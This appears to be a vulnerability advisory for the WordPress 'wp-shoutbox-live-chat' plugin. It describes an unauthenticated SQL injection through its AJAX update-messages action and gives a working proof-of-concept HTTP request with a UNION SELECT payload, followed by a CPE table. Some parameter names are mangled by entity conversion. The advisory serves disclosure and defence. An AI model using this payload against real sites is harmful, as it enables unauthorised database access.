The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
Submit a message in the chatbox, intercept the request using Burp Suite for example. Edit the request to reflect this request: action=shoutbox-ajax-update-messages&last;_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x776562657870)),NULL,NULL,NULL,NULL,NULL–+&rooms;%5B%5D=default Send the Request, and it will succeed and also lists previous messages. POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Origin: http://localhost Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: Shoutbox_alias=Guest_209 Connection: close action=shoutbox-ajax-update-messages&last;_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x776562657870)),NULL,NULL,NULL,NULL,NULL–+&rooms;%5B%5D=default
CPE | Name | Operator | Version |
---|---|---|---|
wp-shoutbox-live-chat | eq | * |